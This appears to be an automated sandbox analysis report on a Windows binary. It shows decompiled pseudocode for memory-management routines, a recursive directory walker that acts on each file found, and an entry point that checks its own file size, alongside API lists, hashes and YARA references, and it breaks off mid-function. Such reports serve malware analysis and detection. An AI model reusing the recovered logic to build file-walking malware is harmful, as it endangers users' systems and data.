                                                                                                                          0x00401380
                                                                                                                          0x00401383
                                                                                                                          0x00401387
                                                                                                                          0x0040138a
                                                                                                                          0x00401394
                                                                                                                          0x00401398
                                                                                                                          0x0040139f
                                                                                                                          0x004013a3
                                                                                                                          0x004013fc
                                                                                                                          0x004013ab
                                                                                                                          0x004013ad
                                                                                                                          0x004013ad
                                                                                                                          0x004013b2
                                                                                                                          0x004013b6
                                                                                                                          0x004013bd
                                                                                                                          0x004013c3
                                                                                                                          0x004013c5
                                                                                                                          0x004013c5
                                                                                                                          0x004013cb
                                                                                                                          0x004013cb
                                                                                                                          0x004013d2
                                                                                                                          0x004013d4
                                                                                                                          0x004013d4
                                                                                                                          0x004013e0
                                                                                                                          0x004013e7
                                                                                                                          0x004013e9
                                                                                                                          0x004013e9
                                                                                                                          0x004013f5
                                                                                                                          0x004013f5
                                                                                                                          0x004013bd
                                                                                                                          0x004013fa
                                                                                                                          0x004013fa
                                                                                                                          0x00401404
                                                                                                                          0x0040140a
                                                                                                                          0x00401411
                                                                                                                          0x00401433
                                                                                                                          0x00401433
                                                                                                                          0x0040141b
                                                                                                                          0x00401421
                                                                                                                          0x00401429
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40a5d4; // 0x40a5d4
				while(_t29 != 0x40a5d4) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                          0x0040143b
                                                                                                                          0x0040143f
                                                                                                                          0x00401446
                                                                                                                          0x0040145b
                                                                                                                          0x00401463
                                                                                                                          0x00401469
                                                                                                                          0x0040146f
                                                                                                                          0x00401472
                                                                                                                          0x004014b6
                                                                                                                          0x0040147a
                                                                                                                          0x0040147a
                                                                                                                          0x0040147d
                                                                                                                          0x00401480
                                                                                                                          0x00401484
                                                                                                                          0x00401486
                                                                                                                          0x00401486
                                                                                                                          0x0040148c
                                                                                                                          0x0040148e
                                                                                                                          0x0040148e
                                                                                                                          0x00401494
                                                                                                                          0x004014a1
                                                                                                                          0x004014a8
                                                                                                                          0x004014aa
                                                                                                                          0x004014b0
                                                                                                                          0x00000000
                                                                                                                          0x004014b0
                                                                                                                          0x004014a8
                                                                                                                          0x004014b4
                                                                                                                          0x004014b4
                                                                                                                          0x004014c5

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40a5d4; // 0x40a5d4
				while(_t19 != 0x40a5d4) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40a5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                                          0x004014cc
                                                                                                                          0x004014dd
                                                                                                                          0x004014e4
                                                                                                                          0x004014ed
                                                                                                                          0x004014f1
                                                                                                                          0x004014f4
                                                                                                                          0x004014f7
                                                                                                                          0x00401537
                                                                                                                          0x004014ff
                                                                                                                          0x004014ff
                                                                                                                          0x00401502
                                                                                                                          0x00401505
                                                                                                                          0x0040150a
                                                                                                                          0x0040150c
                                                                                                                          0x0040150c
                                                                                                                          0x00401511
                                                                                                                          0x00401513
                                                                                                                          0x00401513
                                                                                                                          0x00401517
                                                                                                                          0x00401522
                                                                                                                          0x00401529
                                                                                                                          0x0040152b
                                                                                                                          0x0040152b
                                                                                                                          0x00401529
                                                                                                                          0x00401535
                                                                                                                          0x00401535
                                                                                                                          0x00401544

                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004070DC, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 31%
                                                                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407126);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040712D);
				return E00403094( &_v8);
			}






                                                                                                                          0x004070df
                                                                                                                          0x004070e3
                                                                                                                          0x004070e4
                                                                                                                          0x004070e9
                                                                                                                          0x004070ec
                                                                                                                          0x004070f4
                                                                                                                          0x0040710b
                                                                                                                          0x00407112
                                                                                                                          0x00407115
                                                                                                                          0x00407118
                                                                                                                          0x00407125

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 514040917-2889622443
                                                                                                                          • Opcode ID: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                                                                          • Opcode Fuzzy Hash: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404B90, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                                                                                                                          0x00404b91
                                                                                                                          0x00404b9b

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004080E4, Relevance: .1, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x408054);
				_push(_t79);
				_push(0x408220);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe0;
				E00407080(0x4091a8, 0xb, 0xb);
				E00407080(0x4091b4, 9, 9);
				E00407080(0x4091c0, 3, 3);
				E00407080(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E00407080(_t26, 0xb, 0xb); // executed
				E004070DC(__ebx, __edi, __esi, _t81); // executed
				E004049D0(0, __ebx,  &_v24, __edi, __esi);
				if(E00404F6C(_v24) > 0xa200) {
					E00407678(_t54, _t75, _t76); // executed
				}
				E00407E90(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E00407080(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
				if(_t36 != 0) {
					E004049D0(0, _t54,  &_v28, _t75, _t76);
					_push(_v28);
					_t60 = 3;
					E004031F4( &_v32, 3, 0x4091c4);
					_t70 = _v32;
					_pop(_t47);
					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
					_t84 = _t48;
					if(_t48 != 0) {
						_t70 =  &_v36;
						E004049D0(1, _t54,  &_v36, _t75, _t76);
						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
					}
				}
				E004079A0(_t54, _t75, _t76, _t84); // executed
				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x408227);
				return E004030B8( &_v36, 4);
			}















                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080ec
                                                                                                                          0x004080ef
                                                                                                                          0x004080f2
                                                                                                                          0x004080f5
                                                                                                                          0x004080fd
                                                                                                                          0x00408104
                                                                                                                          0x00408105
                                                                                                                          0x0040810a
                                                                                                                          0x0040810d
                                                                                                                          0x0040811f
                                                                                                                          0x00408133
                                                                                                                          0x00408147
                                                                                                                          0x0040815b
                                                                                                                          0x00408160
                                                                                                                          0x0040816f
                                                                                                                          0x00408174
                                                                                                                          0x0040817e
                                                                                                                          0x00408190
                                                                                                                          0x00408192
                                                                                                                          0x00408192
                                                                                                                          0x00408197
                                                                                                                          0x004081a1
                                                                                                                          0x004081a6
                                                                                                                          0x004081ab
                                                                                                                          0x004081b0
                                                                                                                          0x004081b5
                                                                                                                          0x004081b7
                                                                                                                          0x004081be
                                                                                                                          0x004081c6
                                                                                                                          0x004081cf
                                                                                                                          0x004081d4
                                                                                                                          0x004081d9
                                                                                                                          0x004081dc
                                                                                                                          0x004081dd
                                                                                                                          0x004081e2
                                                                                                                          0x004081e4
                                                                                                                          0x004081e6
                                                                                                                          0x004081ee
                                                                                                                          0x004081f6
                                                                                                                          0x004081f6
                                                                                                                          0x004081e4
                                                                                                                          0x004081fb
                                                                                                                          0x00408200
                                                                                                                          0x00408207
                                                                                                                          0x0040820a
                                                                                                                          0x0040820d
                                                                                                                          0x0040821f

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2572062711-0
                                                                                                                          • Opcode ID: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                                                                          • Opcode Fuzzy Hash: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004074B4, Relevance: .1, Instructions: 81COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t34;
				intOrPtr _t62;
				void* _t71;
				void* _t72;
				void* _t74;
				intOrPtr _t77;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t77);
				_push(0x40758b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				E004031F4( &_v12, 3, 0x4091dc);
				_t49 = E004052AC(_v8, 0, _v12);
				_t71 = E0040532C(_t25) - 1;
				if(_t71 >= 0) {
					_t72 = _t71 + 1;
					_t74 = 0;
					do {
						_t34 = E0040534C(_t49, _t74);
						_t81 = _t34;
						if(_t34 == 0) {
							E00405338(_t49,  &_v28, _t74);
							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
							E004071D0(_v24, _t49, _t72, _t74); // executed
						} else {
							E00405338(_t49,  &_v20, _t74);
							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
						}
						_t74 = _t74 + 1;
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				E00404520(_t49);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00407592);
				return E004030B8( &_v28, 6);
			}















                                                                                                                          0x004074b9
                                                                                                                          0x004074ba
                                                                                                                          0x004074bb
                                                                                                                          0x004074bc
                                                                                                                          0x004074bd
                                                                                                                          0x004074be
                                                                                                                          0x004074c2
                                                                                                                          0x004074c8
                                                                                                                          0x004074cf
                                                                                                                          0x004074d0
                                                                                                                          0x004074d5
                                                                                                                          0x004074d8
                                                                                                                          0x004074e8
                                                                                                                          0x004074fa
                                                                                                                          0x00407505
                                                                                                                          0x00407508
                                                                                                                          0x0040750a
                                                                                                                          0x0040750b
                                                                                                                          0x0040750d
                                                                                                                          0x00407511
                                                                                                                          0x00407516
                                                                                                                          0x00407518
                                                                                                                          0x0040754a
                                                                                                                          0x00407558
                                                                                                                          0x00407560
                                                                                                                          0x0040751a
                                                                                                                          0x00407525
                                                                                                                          0x00407533
                                                                                                                          0x0040753b
                                                                                                                          0x00407540
                                                                                                                          0x00407565
                                                                                                                          0x00407566
                                                                                                                          0x00407566
                                                                                                                          0x0040750d
                                                                                                                          0x0040756b
                                                                                                                          0x00407572
                                                                                                                          0x00407575
                                                                                                                          0x00407578
                                                                                                                          0x0040758a

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                                                                          • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                                                                                          • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                                                                          • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406E94, Relevance: .0, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f30]");
					asm("fnstsw ax");
					asm("sahf");
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00406F29);
				return E004030B8( &_v20, 2);
			}










                                                                                                                          0x00406e9a
                                                                                                                          0x00406e9d
                                                                                                                          0x00406ea0
                                                                                                                          0x00406ea5
                                                                                                                          0x00406ea6
                                                                                                                          0x00406eab
                                                                                                                          0x00406eae
                                                                                                                          0x00406eb6
                                                                                                                          0x00406ebe
                                                                                                                          0x00406ecc
                                                                                                                          0x00406ed4
                                                                                                                          0x00406ed5
                                                                                                                          0x00406eea
                                                                                                                          0x00406ef1
                                                                                                                          0x00406ef3
                                                                                                                          0x00406efb
                                                                                                                          0x00406f01
                                                                                                                          0x00406f03
                                                                                                                          0x00406f04
                                                                                                                          0x00406f09
                                                                                                                          0x00406f0c
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f21

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalPathTempTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118298429-0
                                                                                                                          • Opcode ID: 4d43c894cee0dd55262f3b1b2c5c40d1f0ba545ea5d4454e7357d5f13f266e22
                                                                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                                                                          • Opcode Fuzzy Hash: 4d43c894cee0dd55262f3b1b2c5c40d1f0ba545ea5d4454e7357d5f13f266e22
                                                                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406E0C, Relevance: .0, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E00406E0C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t19;
				intOrPtr _t37;
				void* _t43;
				long long _t47;

				_t47 = __fp0;
				_v16 = 0;
				_v20 = 0;
				_push(_t43);
				_push(0x406e88);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				E004057D8(__fp0);
				_v12 = _t47;
				asm("wait");
				E00405008( &_v16, __ebx, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t19);
				E00403214(_t19, _v20);
				E00404BF8(E0040340C(_v16), __ebx, 8,  &_v12, __edi, __esi); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E00406E8F);
				return E004030B8( &_v20, 2);
			}










                                                                                                                          0x00406e0c
                                                                                                                          0x00406e14
                                                                                                                          0x00406e17
                                                                                                                          0x00406e1c
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e22
                                                                                                                          0x00406e25
                                                                                                                          0x00406e28
                                                                                                                          0x00406e2d
                                                                                                                          0x00406e30
                                                                                                                          0x00406e34
                                                                                                                          0x00406e3c
                                                                                                                          0x00406e4a
                                                                                                                          0x00406e52
                                                                                                                          0x00406e53
                                                                                                                          0x00406e68
                                                                                                                          0x00406e6f
                                                                                                                          0x00406e72
                                                                                                                          0x00406e75
                                                                                                                          0x00406e87

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalPathTempTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118298429-0
                                                                                                                          • Opcode ID: ceba8b285a4ba6e7948585752b84f46e4e628e374ee922886d776555de2f2cf3
                                                                                                                          • Instruction ID: 12372a3f9371d2085618e996b35078a817f0987df7eb07415f7737174ae74002
                                                                                                                          • Opcode Fuzzy Hash: ceba8b285a4ba6e7948585752b84f46e4e628e374ee922886d776555de2f2cf3
                                                                                                                          • Instruction Fuzzy Hash: 650167759006089FDB00EFA5C85269EBBB8EB44304F51897BA414E36C1DB389A14CA99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004052AC, Relevance: .0, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
				void* __esi;
				void* _t7;
				intOrPtr _t11;
				void* _t14;

				_t14 = __eax;
				_t11 =  *0x40447c; // 0x404488
				_t7 = E004044F8(_t11, 0);
				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
				return _t7;
			}







                                                                                                                          0x004052b4
                                                                                                                          0x004052b6
                                                                                                                          0x004052c3
                                                                                                                          0x004052cc
                                                                                                                          0x004052d7

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402448, Relevance: .0, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
